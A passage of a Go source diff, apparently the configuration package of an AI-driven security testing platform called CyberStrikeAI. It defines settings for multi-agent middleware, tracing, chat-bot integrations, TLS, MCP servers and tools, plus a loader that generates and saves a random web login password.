string { + if !c.Enabled { + return "off" + } + m := strings.TrimSpace(strings.ToLower(c.Mode)) + switch m { + case "log_only": + return "log_only" + case "sse": + return "sse" + case "full": + return "full" + case "": + return "log_only" + default: + return "log_only" + } +} + +// SseTraceToClientEffective is false unless explicitly set true (best practice: do not expose framework traces to end users by default). +func (c MultiAgentEinoCallbacksConfig) SseTraceToClientEffective() bool { + if c.SseTraceToClient == nil { + return false + } + return *c.SseTraceToClient +} + +// ShouldEmitEinoTraceSSE is true when client-visible trace events should be sent over progress/SSE. +func (c MultiAgentEinoCallbacksConfig) ShouldEmitEinoTraceSSE(mode string) bool { + if !c.SseTraceToClientEffective() { + return false + } + return mode == "sse" || mode == "full" +} + +// OtelExporterEffective returns none | stdout | otlphttp. +func (c MultiAgentEinoCallbacksOtelConfig) OtelExporterEffective() string { + e := strings.TrimSpace(strings.ToLower(c.Exporter)) + switch e { + case "none", "stdout", "otlphttp": + return e + case "": + if c.Enabled { + return "stdout" + } + return "none" + default: + return "none" + } +} + +// OtelTracingActive is true when spans should be started (enabled + non-none exporter). +func (c MultiAgentEinoCallbacksConfig) OtelTracingActive() bool { + if !c.Otel.Enabled { + return false + } + return c.Otel.OtelExporterEffective() != "none" +} + +func (c MultiAgentEinoCallbacksOtelConfig) ServiceNameEffective() string { + s := strings.TrimSpace(c.ServiceName) + if s != "" { + return s + } + return "cyberstrike-ai" +} + +func (c MultiAgentEinoCallbacksOtelConfig) SampleRatioEffective() float64 { + r := c.SampleRatio + if r <= 0 { + return 1.0 + } + if r > 1 { + return 1.0 + } + return r +} + +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxInputSummaryRunes() int { + if c.MaxInputSummaryRunes > 0 { + return c.MaxInputSummaryRunes + } + return 400 +} + +func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxOutputSummaryRunes() int { + if c.MaxOutputSummaryRunes > 0 { + return c.MaxOutputSummaryRunes + } + return 400 +} + +// MultiAgentEinoMiddlewareConfig optional Eino ADK middleware and Deep / supervisor tuning. +type MultiAgentEinoMiddlewareConfig struct { + // PatchToolCalls inserts placeholder tool results for dangling assistant tool_calls (nil = enabled). + PatchToolCalls *bool `yaml:"patch_tool_calls,omitempty" json:"patch_tool_calls,omitempty"` + // ToolSearch enables dynamictool/toolsearch: hide tail tools until model calls tool_search (reduces prompt tools). + ToolSearchEnable bool `yaml:"tool_search_enable,omitempty" json:"tool_search_enable,omitempty"` + ToolSearchMinTools int `yaml:"tool_search_min_tools,omitempty" json:"tool_search_min_tools,omitempty"` // default 20; applies when len(tools) >= this + ToolSearchAlwaysVisible int `yaml:"tool_search_always_visible,omitempty" json:"tool_search_always_visible,omitempty"` // default 12; first N tools stay always visible + // ToolSearchAlwaysVisibleTools keeps specified tool names always visible (never hidden by tool_search). + ToolSearchAlwaysVisibleTools []string `yaml:"tool_search_always_visible_tools,omitempty" json:"tool_search_always_visible_tools,omitempty"` + // Plantask adds TaskCreate/Get/Update/List (file-backed under skills dir); requires eino_skills + local backend. + PlantaskEnable bool `yaml:"plantask_enable,omitempty" json:"plantask_enable,omitempty"` + // PlantaskRelDir relative to skills_dir for per-conversation task boards (default .eino/plantask). + PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"` + // Reduction truncates/offloads large tool outputs (requires eino local backend for Write). + ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"` + ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id + ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000 + ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000 + ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"` + ReductionSubAgents bool `yaml:"reduction_sub_agents,omitempty" json:"reduction_sub_agents,omitempty"` // also attach to sub-agents + // SummarizationTriggerRatio controls summarization trigger threshold as max_total_tokens * ratio (default 0.8). + SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"` + // SummarizationEmitInternalEvents controls middleware internal event emission (default true). + SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"` + // HistoryInputBudgetRatio 已不影响 Eino:从 last_react 轨迹转 ADK 消息时**不再**按 token 比例裁剪(完整注入)。 + // 字段仍保留,便于旧版 config 不报错;新部署可省略。 + HistoryInputBudgetRatio float64 `yaml:"history_input_budget_ratio,omitempty" json:"history_input_budget_ratio,omitempty"` + // PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35). + PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"` + // PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2). + PlanExecuteExecutedStepsBudgetRatio float64 `yaml:"plan_execute_executed_steps_budget_ratio,omitempty" json:"plan_execute_executed_steps_budget_ratio,omitempty"` + // PlanExecuteMaxStepResultRunes caps each executed step result length for prompt view (default 4000). + PlanExecuteMaxStepResultRunes int `yaml:"plan_execute_max_step_result_runes,omitempty" json:"plan_execute_max_step_result_runes,omitempty"` + // PlanExecuteKeepLastSteps keeps only the tail steps in prompt view (default 8). + PlanExecuteKeepLastSteps int `yaml:"plan_execute_keep_last_steps,omitempty" json:"plan_execute_keep_last_steps,omitempty"` + // CheckpointDir when non-empty enables adk.Runner CheckPointStore (file-backed) for interrupt/resume persistence. + CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"` + // DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off. + DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"` + // DeepModelRetryMaxRetries > 0 enables deep.Config ModelRetryConfig (framework-level chat model retries). + DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"` + // TaskToolDescriptionPrefix when non-empty sets deep.Config TaskToolDescriptionGenerator (sub-agent names appended). + TaskToolDescriptionPrefix string `yaml:"task_tool_description_prefix,omitempty" json:"task_tool_description_prefix,omitempty"` +} + +func (c MultiAgentEinoMiddlewareConfig) SummarizationTriggerRatioEffective() float64 { + v := c.SummarizationTriggerRatio + if v <= 0 { + return 0.8 + } + if v < 0.5 { + return 0.5 + } + if v > 0.95 { + return 0.95 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) SummarizationEmitInternalEventsEffective() bool { + if c.SummarizationEmitInternalEvents != nil { + return *c.SummarizationEmitInternalEvents + } + return true +} + +func (c MultiAgentEinoMiddlewareConfig) HistoryInputBudgetRatioEffective() float64 { + v := c.HistoryInputBudgetRatio + if v <= 0 { + return 0.35 + } + if v < 0.15 { + return 0.15 + } + if v > 0.6 { + return 0.6 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteUserInputBudgetRatioEffective() float64 { + v := c.PlanExecuteUserInputBudgetRatio + if v <= 0 { + return 0.35 + } + if v < 0.1 { + return 0.1 + } + if v > 0.6 { + return 0.6 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteExecutedStepsBudgetRatioEffective() float64 { + v := c.PlanExecuteExecutedStepsBudgetRatio + if v <= 0 { + return 0.2 + } + if v < 0.08 { + return 0.08 + } + if v > 0.5 { + return 0.5 + } + return v +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteMaxStepResultRunesEffective() int { + if c.PlanExecuteMaxStepResultRunes > 0 { + return c.PlanExecuteMaxStepResultRunes + } + return 4000 +} + +func (c MultiAgentEinoMiddlewareConfig) PlanExecuteKeepLastStepsEffective() int { + if c.PlanExecuteKeepLastSteps > 0 { + return c.PlanExecuteKeepLastSteps + } + return 8 +} + +func (c MultiAgentEinoMiddlewareConfig) ReductionMaxLengthForTruncEffective() int { + if c.ReductionMaxLengthForTrunc > 0 { + return c.ReductionMaxLengthForTrunc + } + return 12000 +} + +func (c MultiAgentEinoMiddlewareConfig) ReductionMaxTokensForClearEffective() int { + if c.ReductionMaxTokensForClear > 0 { + return c.ReductionMaxTokensForClear + } + return 50000 +} + +// MultiAgentEinoSkillsConfig toggles Eino official skill progressive disclosure and host filesystem tools. +type MultiAgentEinoSkillsConfig struct { + // Disable skips skill middleware (and does not attach local FS tools for Deep). + Disable bool `yaml:"disable" json:"disable"` + // FilesystemTools registers read_file/glob/grep/write/edit/execute (eino-ext local backend). Nil/omitted = true. + FilesystemTools *bool `yaml:"filesystem_tools,omitempty" json:"filesystem_tools,omitempty"` + // SkillToolName overrides the default Eino tool name "skill". + SkillToolName string `yaml:"skill_tool_name,omitempty" json:"skill_tool_name,omitempty"` +} + +// EinoSkillFilesystemToolsEffective returns whether Deep/sub-agents should attach local filesystem + streaming shell. +func (c MultiAgentEinoSkillsConfig) EinoSkillFilesystemToolsEffective() bool { + if c.FilesystemTools != nil { + return *c.FilesystemTools + } + return true +} + +// PatchToolCallsEffective returns whether patchtoolcalls middleware should run (default true). +func (c MultiAgentEinoMiddlewareConfig) PatchToolCallsEffective() bool { + if c.PatchToolCalls != nil { + return *c.PatchToolCalls + } + return true +} + +// MultiAgentSubConfig 子代理(Eino ChatModelAgent):deep 下由 task 调度;supervisor 下由 transfer 委派;plan_execute 不使用子代理列表。 +type MultiAgentSubConfig struct { + ID string `yaml:"id" json:"id"` + Name string `yaml:"name" json:"name"` + Description string `yaml:"description" json:"description"` + Instruction string `yaml:"instruction" json:"instruction"` + BindRole string `yaml:"bind_role,omitempty" json:"bind_role,omitempty"` // 可选:关联主配置 roles 中的角色名;未配 role_tools 时沿用该角色的 tools + RoleTools []string `yaml:"role_tools" json:"role_tools"` // 与单 Agent 角色工具相同 key;空表示全部工具(bind_role 可补全 tools) + MaxIterations int `yaml:"max_iterations" json:"max_iterations"` + Kind string `yaml:"kind,omitempty" json:"kind,omitempty"` // 仅 Markdown:kind=orchestrator 表示 Deep 主代理(与 orchestrator.md 二选一约定) +} + +// MultiAgentPublic 返回给前端的精简信息(不含子代理指令全文)。 +type MultiAgentPublic struct { + Enabled bool `json:"enabled"` + RobotUseMultiAgent bool `json:"robot_use_multi_agent"` + BatchUseMultiAgent bool `json:"batch_use_multi_agent"` + SubAgentCount int `json:"sub_agent_count"` + Orchestration string `json:"orchestration,omitempty"` + PlanExecuteLoopMaxIterations int `json:"plan_execute_loop_max_iterations"` + ToolSearchAlwaysVisibleTools []string `json:"tool_search_always_visible_tools,omitempty"` + ToolSearchAlwaysVisibleEffectiveTools []string `json:"tool_search_always_visible_effective_tools,omitempty"` +} + +// NormalizeMultiAgentOrchestration 返回 deep、plan_execute 或 supervisor。 +func NormalizeMultiAgentOrchestration(s string) string { + v := strings.TrimSpace(strings.ToLower(s)) + switch v { + case "plan_execute", "plan-execute", "planexecute", "pe": + return "plan_execute" + case "supervisor", "super", "sv": + return "supervisor" + default: + return "deep" + } +} + +// MultiAgentAPIUpdate 设置页/API 仅更新多代理标量字段;写入 YAML 时不覆盖 sub_agents 等块。 +type MultiAgentAPIUpdate struct { + Enabled bool `json:"enabled"` + RobotUseMultiAgent bool `json:"robot_use_multi_agent"` + BatchUseMultiAgent bool `json:"batch_use_multi_agent"` + PlanExecuteLoopMaxIterations *int `json:"plan_execute_loop_max_iterations,omitempty"` + // 指针区分「JSON 未传该字段」与「传空数组要清空」;省略时不应覆盖 YAML 中的常驻工具白名单。 + ToolSearchAlwaysVisibleTools *[]string `json:"tool_search_always_visible_tools,omitempty"` +} + +// RobotsConfig 机器人配置(企业微信、钉钉、飞书等) +type RobotsConfig struct { + Session RobotSessionConfig `yaml:"session,omitempty" json:"session,omitempty"` // 机器人会话隔离策略 + Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信 + Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉 + Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书 +} + +// RobotSessionConfig 机器人会话隔离策略 +type RobotSessionConfig struct { + StrictUserIdentity *bool `yaml:"strict_user_identity,omitempty" json:"strict_user_identity,omitempty"` // true 时只允许真实用户标识,不允许会话/群 ID 兜底 +} + +// StrictUserIdentityEnabled 返回是否启用严格用户身份模式;未配置时默认 true。 +func (c RobotSessionConfig) StrictUserIdentityEnabled() bool { + if c.StrictUserIdentity == nil { + return true + } + return *c.StrictUserIdentity +} + +// RobotWecomConfig 企业微信机器人配置 +type RobotWecomConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + Token string `yaml:"token" json:"token"` // 回调 URL 校验 Token + EncodingAESKey string `yaml:"encoding_aes_key" json:"encoding_aes_key"` // EncodingAESKey + CorpID string `yaml:"corp_id" json:"corp_id"` // 企业 ID + Secret string `yaml:"secret" json:"secret"` // 应用 Secret + AgentID int64 `yaml:"agent_id" json:"agent_id"` // 应用 AgentId +} + +// RobotDingtalkConfig 钉钉机器人配置 +type RobotDingtalkConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey) + ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret + AllowConversationIDFallback bool `yaml:"allow_conversation_id_fallback" json:"allow_conversation_id_fallback"` // sender_id 缺失时是否允许回退到会话 ID +} + +// RobotLarkConfig 飞书机器人配置 +type RobotLarkConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` + AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID + AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret + VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选) + AllowChatIDFallback bool `yaml:"allow_chat_id_fallback" json:"allow_chat_id_fallback"` // 用户 ID 缺失时是否允许回退到 chat_id +} + +type ServerConfig struct { + Host string `yaml:"host" json:"host"` + Port int `yaml:"port" json:"port"` + // TLSEnabled 为 true 时主 Web UI 使用 HTTPS;现代浏览器在同源下会协商 HTTP/2,缓解 HTTP/1.1 每源并发连接数限制。 + TLSEnabled bool `yaml:"tls_enabled,omitempty" json:"tls_enabled,omitempty"` + // TLSCertPath / TLSKeyPath 非空时从 PEM 文件加载证书(生产环境推荐)。 + TLSCertPath string `yaml:"tls_cert_path,omitempty" json:"tls_cert_path,omitempty"` + TLSKeyPath string `yaml:"tls_key_path,omitempty" json:"tls_key_path,omitempty"` + // TLSAutoSelfSign 为 true 且未配置有效证书路径时,启动时生成内存自签证书(仅本地/测试;浏览器会提示不受信任)。 + TLSAutoSelfSign bool `yaml:"tls_auto_self_sign,omitempty" json:"tls_auto_self_sign,omitempty"` + // TLSHTTPRedirect 为 false 时禁用 HTTP→HTTPS 跳转;省略或为 true 且已启用 HTTPS 时,明文 HTTP 访问将 308 跳转到 HTTPS(同端口嗅探分流)。 + TLSHTTPRedirect *bool `yaml:"tls_http_redirect,omitempty" json:"tls_http_redirect,omitempty"` +} + +type LogConfig struct { + Level string `yaml:"level"` + Output string `yaml:"output"` +} + +type MCPConfig struct { + Enabled bool `yaml:"enabled"` + Host string `yaml:"host"` + Port int `yaml:"port"` + AuthHeader string `yaml:"auth_header,omitempty"` // 鉴权 header 名,留空表示不鉴权 + AuthHeaderValue string `yaml:"auth_header_value,omitempty"` // 鉴权 header 值,需与请求中该 header 一致 +} + +type OpenAIConfig struct { + Provider string `yaml:"provider,omitempty" json:"provider,omitempty"` // API 提供商: "openai"(默认) 或 "claude",claude 时自动桥接为 Anthropic Messages API + APIKey string `yaml:"api_key" json:"api_key"` + BaseURL string `yaml:"base_url" json:"base_url"` + Model string `yaml:"model" json:"model"` + MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"` + // Reasoning 控制 Eino ChatModel 的 thinking / reasoning_effort / output_config 等(仅 Eino 路径生效;原生 ReAct 忽略)。 + Reasoning OpenAIReasoningConfig `yaml:"reasoning,omitempty" json:"reasoning,omitempty"` +} + +// OpenAIReasoningConfig 全局默认与网关 profile(对话页可通过 ChatRequest.reasoning 覆盖,受 AllowClientReasoning 约束)。 +type OpenAIReasoningConfig struct { + // Mode: auto(默认)| on | off | default(与 auto 相同)。off 时不向模型附加推理扩展字段。 + Mode string `yaml:"mode,omitempty" json:"mode,omitempty"` + // Effort: low | medium | high | max;空表示不单独指定强度(各 profile 行为见 internal/reasoning)。 + Effort string `yaml:"effort,omitempty" json:"effort,omitempty"` + // AllowClientReasoning 为 false 时忽略请求体 reasoning;nil 或未设置等同于 true。 + AllowClientReasoning *bool `yaml:"allow_client_reasoning,omitempty" json:"allow_client_reasoning,omitempty"` + // Profile: auto | deepseek_compat | openai_compat | output_config_effort + Profile string `yaml:"profile,omitempty" json:"profile,omitempty"` + // ExtraRequestFields 合并进 Chat Completions 根 JSON(管理员用;与自动字段同名时后者覆盖)。 + ExtraRequestFields map[string]interface{} `yaml:"extra_request_fields,omitempty" json:"extra_request_fields,omitempty"` +} + +// ModeEffective returns auto when empty or default. +func (c OpenAIReasoningConfig) ModeEffective() string { + m := strings.ToLower(strings.TrimSpace(c.Mode)) + if m == "" || m == "default" { + return "auto" + } + return m +} + +// ProfileEffective returns auto when empty. +func (c OpenAIReasoningConfig) ProfileEffective() string { + p := strings.ToLower(strings.TrimSpace(c.Profile)) + if p == "" { + return "auto" + } + return p +} + +// AllowClientReasoningEffective true when client may send ChatRequest.reasoning. +func (c OpenAIReasoningConfig) AllowClientReasoningEffective() bool { + if c.AllowClientReasoning == nil { + return true + } + return *c.AllowClientReasoning +} + +type FofaConfig struct { + // Email 为 FOFA 账号邮箱;APIKey 为 FOFA API Key(建议使用只读权限的 Key) + Email string `yaml:"email,omitempty" json:"email,omitempty"` + APIKey string `yaml:"api_key,omitempty" json:"api_key,omitempty"` + BaseURL string `yaml:"base_url,omitempty" json:"base_url,omitempty"` // 默认 https://fofa.info/api/v1/search/all +} + +type SecurityConfig struct { + Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具 + ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式) + ToolDescriptionMode string `yaml:"tool_description_mode,omitempty"` // 工具描述模式: "short" | "full",默认 short +} + +type DatabaseConfig struct { + Path string `yaml:"path"` // 会话数据库路径 + KnowledgeDBPath string `yaml:"knowledge_db_path,omitempty"` // 知识库数据库路径(可选,为空则使用会话数据库) +} + +type AgentConfig struct { + MaxIterations int `yaml:"max_iterations" json:"max_iterations"` + LargeResultThreshold int `yaml:"large_result_threshold" json:"large_result_threshold"` // 大结果阈值(字节),默认50KB + ResultStorageDir string `yaml:"result_storage_dir" json:"result_storage_dir"` // 结果存储目录,默认tmp + ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐) + // SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。 + SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"` +} + +// HitlConfig 人机协同全局选项;与会话侧栏/API 中的白名单合并为并集后参与判定。 +// tool_whitelist 可在侧栏「应用」时合并写入 config.yaml 并立即生效;其他字段若仅改文件仍需重启。 +type HitlConfig struct { + // ToolWhitelist 全局免审批工具名(与每条会话配置的 sensitiveTools 语义相同:白名单内工具不触发 HITL)。 + ToolWhitelist []string `yaml:"tool_whitelist,omitempty" json:"tool_whitelist,omitempty"` +} + +type AuthConfig struct { + Password string `yaml:"password" json:"password"` + SessionDurationHours int `yaml:"session_duration_hours" json:"session_duration_hours"` + GeneratedPassword string `yaml:"-" json:"-"` + GeneratedPasswordPersisted bool `yaml:"-" json:"-"` + GeneratedPasswordPersistErr string `yaml:"-" json:"-"` +} + +// ExternalMCPConfig 外部MCP配置 +type ExternalMCPConfig struct { + Servers map[string]ExternalMCPServerConfig `yaml:"servers,omitempty" json:"servers,omitempty"` +} + +// ExternalMCPServerConfig 外部MCP服务器配置(遵循官方 MCP 配置格式,兼容 Claude Desktop / Cursor / VS Code)。 +// 所有字符串字段均支持 ${VAR} 和 ${VAR:-default} 环境变量展开语法。 +type ExternalMCPServerConfig struct { + // 传输类型: "stdio" | "sse" | "http"(Streamable HTTP)。 + // stdio 模式可省略,有 command 字段时自动推断。 + Type string `yaml:"type,omitempty" json:"type,omitempty"` + + // stdio 模式配置 + Command string `yaml:"command,omitempty" json:"command,omitempty"` + Args []string `yaml:"args,omitempty" json:"args,omitempty"` + Env map[string]string `yaml:"env,omitempty" json:"env,omitempty"` + + // HTTP/SSE 模式配置 + URL string `yaml:"url,omitempty" json:"url,omitempty"` + Headers map[string]string `yaml:"headers,omitempty" json:"headers,omitempty"` + + // 官方标准字段 + Disabled bool `yaml:"disabled,omitempty" json:"disabled,omitempty"` // 禁用服务器(官方字段) + AutoApprove []string `yaml:"autoApprove,omitempty" json:"autoApprove,omitempty"` // 自动批准的工具列表(官方字段) + + // SDK 高级配置(对应 MCP Go SDK 传输层参数) + MaxRetries int `yaml:"max_retries,omitempty" json:"max_retries,omitempty"` // Streamable HTTP 断线重连次数(默认 5) + TerminateDuration int `yaml:"terminate_duration,omitempty" json:"terminate_duration,omitempty"` // stdio 进程优雅关闭等待秒数(默认 5) + KeepAlive int `yaml:"keep_alive,omitempty" json:"keep_alive,omitempty"` // 客户端心跳间隔秒数(0 = 禁用) + + // 通用配置 + Description string `yaml:"description,omitempty" json:"description,omitempty"` + Timeout int `yaml:"timeout,omitempty" json:"timeout,omitempty"` // 连接超时(秒) + ExternalMCPEnable bool `yaml:"external_mcp_enable,omitempty" json:"external_mcp_enable,omitempty"` // 是否启用 + ToolEnabled map[string]bool `yaml:"tool_enabled,omitempty" json:"tool_enabled,omitempty"` // 每个工具的启用状态 +} + +// GetTransportType 返回实际传输类型。优先读 Type,否则根据 Command/URL 自动推断。 +func (c ExternalMCPServerConfig) GetTransportType() string { + if c.Type != "" { + return c.Type + } + if c.Command != "" { + return "stdio" + } + if c.URL != "" { + return "http" + } + return "" +} + +type ToolConfig struct { + Name string `yaml:"name"` + Command string `yaml:"command"` + Args []string `yaml:"args,omitempty"` // 固定参数(可选) + ShortDescription string `yaml:"short_description,omitempty"` // 简短描述(用于工具列表,减少token消耗) + Description string `yaml:"description"` // 详细描述(用于工具文档) + Enabled bool `yaml:"enabled"` + Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选) + ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选) + AllowedExitCodes []int `yaml:"allowed_exit_codes,omitempty"` // 允许的退出码列表(某些工具在成功时也返回非零退出码) +} + +// ParameterConfig 参数配置 +type ParameterConfig struct { + Name string `yaml:"name"` // 参数名称 + Type string `yaml:"type"` // 参数类型: string, int, bool, array + Description string `yaml:"description"` // 参数描述 + Required bool `yaml:"required,omitempty"` // 是否必需 + Default interface{} `yaml:"default,omitempty"` // 默认值 + ItemType string `yaml:"item_type,omitempty"` // 当 type 为 array 时,数组元素类型,如 string, number, object + Flag string `yaml:"flag,omitempty"` // 命令行标志,如 "-u", "--url", "-p" + Position *int `yaml:"position,omitempty"` // 位置参数的位置(从0开始) + Format string `yaml:"format,omitempty"` // 参数格式: "flag", "positional", "combined" (flag=value), "template" + Template string `yaml:"template,omitempty"` // 模板字符串,如 "{flag} {value}" 或 "{value}" + Options []string `yaml:"options,omitempty"` // 可选值列表(用于枚举) +} + +func Load(path string) (*Config, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取配置文件失败: %w", err) + } + + var cfg Config + if err := yaml.Unmarshal(data, &cfg); err != nil { + return nil, fmt.Errorf("解析配置文件失败: %w", err) + } + + if cfg.Auth.SessionDurationHours <= 0 { + cfg.Auth.SessionDurationHours = 12 + } + if strings.TrimSpace(cfg.Auth.Password) == "" { + password, err := generateStrongPassword(24) + if err != nil { + return nil, fmt.Errorf("生成默认密码失败: %w", err) + } + + cfg.Auth.Password = password + cfg.Auth.GeneratedPassword = password + + if err := PersistAuthPassword(path, password); err != nil { + cfg.Auth.GeneratedPasswordPersisted = false + cfg.Auth.GeneratedPasswordPersistErr = err.Error() + } else { + cfg.Auth.GeneratedPasswordPersisted = true + } + } + + // 如果配置了工具目录,从目录加载工具配置 + if cfg.Security.ToolsDir != "" { + configDir := filepath.Dir(path) + toolsDir := cfg.Security.ToolsDir + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(toolsDir) { + toolsDir = filepath.Join(configDir, toolsDir) + } + + tools, err := LoadToolsFromDir(toolsDir) + if err != nil { + return nil, fmt.Errorf("从工具目录加载工具配置失败: %w", err) + } + + // 合并工具配置:目录中的工具优先,主配置中的工具作为补充 + existingTools := make(map[string]bool) + for _, tool := range tools { + existingTools[tool.Name] = true + } + + // 添加主配置中不存在于目录中的工具(向后兼容) + for _, tool := range cfg.Security.Tools { + if !existingTools[tool.Name] { + tools = append(tools, tool) + } + } + + cfg.Security.Tools = tools + } + + // 外部 MCP:迁移 + 环境变量展开 + if cfg.ExternalMCP.Servers != nil { + for name, serverCfg := range cfg.ExternalMCP.Servers { + // 官方 disabled 字段 → ExternalMCPEnable + if serverCfg.Disabled { + serverCfg.ExternalMCPEnable = false + } else if !serverCfg.ExternalMCPEnable { + // 默认启用 + serverCfg.ExternalMCPEnable = true + } + + // 展开所有 ${VAR} / ${VAR:-default} 环境变量引用 + ExpandConfigEnv(&serverCfg) + + cfg.ExternalMCP.Servers[name] = serverCfg + } + } + + // 从角色目录加载角色配置 + if cfg.RolesDir != "" { + configDir := filepath.Dir(path) + rolesDir := cfg.RolesDir + + // 如果是相对路径,相对于配置文件所在目录 + if !filepath.IsAbs(rolesDir) { + rolesDir = filepath.Join(configDir, rolesDir) + } + + roles, err := LoadRolesFromDir(rolesDir) + if err != nil { + return nil, fmt.Errorf("从角色目录加载角色配置失败: %w", err) + } + + cfg.Roles = roles + } else { + // 如果未配置 roles_dir,初始化为空 map + if cfg.Roles == nil { + cfg.Roles = make(map[string]RoleConfig) + } + } + + return &cfg, nil +} + +func generateStrongPassword(length int) (string, error) { + if length <= 0 { + length = 24 + } + + bytesLen := length + randomBytes := make([]byte, bytesLen) + if _, err := rand.Read(randomBytes); err != nil { + return "", err + } + + password := base64.RawURLEncoding.EncodeToString(randomBytes) + if len(password) > length { + password = password[:length] + } + return password, nil +} + +func PersistAuthPassword(path, password string) error { + data, err := os.ReadFile(path) + if err != nil { + return err + } + + lines := strings.Split(string(data), "\n") + inAuthBlock := false + authIndent := -1 + + for i, line := range lines { + trimmed := strings.TrimSpace(line) + if !inAuthBlock { + if strings.HasPrefix(trimmed, "auth:") { + inAuthBlock = true + authIndent = len(line) - len(strings.TrimLeft(line, " ")) + } + continue + } + + if trimmed == "" || strings.HasPrefix(trimmed, "#") { + continue + } + + leadingSpaces := len(line) - len(strings.TrimLeft(line, " ")) + if leadingSpaces <= authIndent { + // 离开 auth 块 + inAuthBlock = false + authIndent = -1 + // 继续寻找其它 auth 块(理论上没有) + if strings.HasPrefix(trimmed, "auth:") { + inAuthBlock = true + authIndent = leadingSpaces + } + continue + } + + if strings.HasPrefix(strings.TrimSpace(line), "password:") { + prefix := line[:len(line)-len(strings.TrimLeft(line, " "))] + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimRight(line[idx:], " ") + } + + newLine := fmt.Sprintf("%spassword: %s", prefix, password) + if comment != "" { + if !strings.HasPrefix(comment, " ") { + newLine += " " + } + newLine += comment + } + lines[i] = newLine + break + } + } + + return os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0644) +} + +func PrintGeneratedPasswordWarning(password string, persisted bool, persistErr string) { + if strings.TrimSpace(password) == "" { + return + } + + if persisted { + fmt.Println("[CyberStrikeAI] ✅ 已为您自动生成并写入 Web 登录密码。") + } else { + if persistErr != "" { + fmt.Printf("[CyberStrikeAI] ⚠️ 无法自动写入配置文件中的密码: %s\n", persistErr) + } else { + fmt.Println("[CyberStrikeAI] ⚠️ 无法自动写入配置文件中的密码。") + } + fmt.Println("请手动将以下随机密码写入 config.yaml 的 auth.password:") + } + + fmt.Println("----------------------------------------------------------------") + fmt.Println("CyberStrikeAI Auto-Generated Web Password") + fmt.Printf("Password: %s\n", password) + fmt.Println("WARNING: Anyone with this password can fully control CyberStrikeAI.") + fmt.Println("Please store it securely and change it in config.yaml as soon as possible.") + fmt.Println("警告:持有此密码的人将拥有对 CyberStrikeAI 的完全控制权限。") + fmt.Println("请妥善保管,并尽快在 config.yaml 中修改 auth.password!") + fmt.Println("----------------------------------------------------------------") +} + +// generateRandomToken 生成用于 MCP 鉴权的随机字符串(64 位十六进制) +func generateRandomToken() (string, error) { + b := make([]byte, 32) + if _, err := rand.Read(b); err != nil { + return "", err + } + return hex.EncodeToString(b), nil +} + +// persistMCPAuth 将 MCP 的 auth_header / auth_header_value 写回配置文件 +func persistMCPAuth(path string, mcp *MCPConfig) error { + data, err := os.ReadFile(path) + if err != nil { + return err + } + lines := strings.Split(string(data), "\n") + inMcpBlock := false + mcpIndent := -1 + + for i, line := range lines { + trimmed := strings.TrimSpace(line) + if !inMcpBlock { + if strings.HasPrefix(trimmed, "mcp:") { + inMcpBlock = true + mcpIndent = len(line) - len(strings.TrimLeft(line, " ")) + } + continue 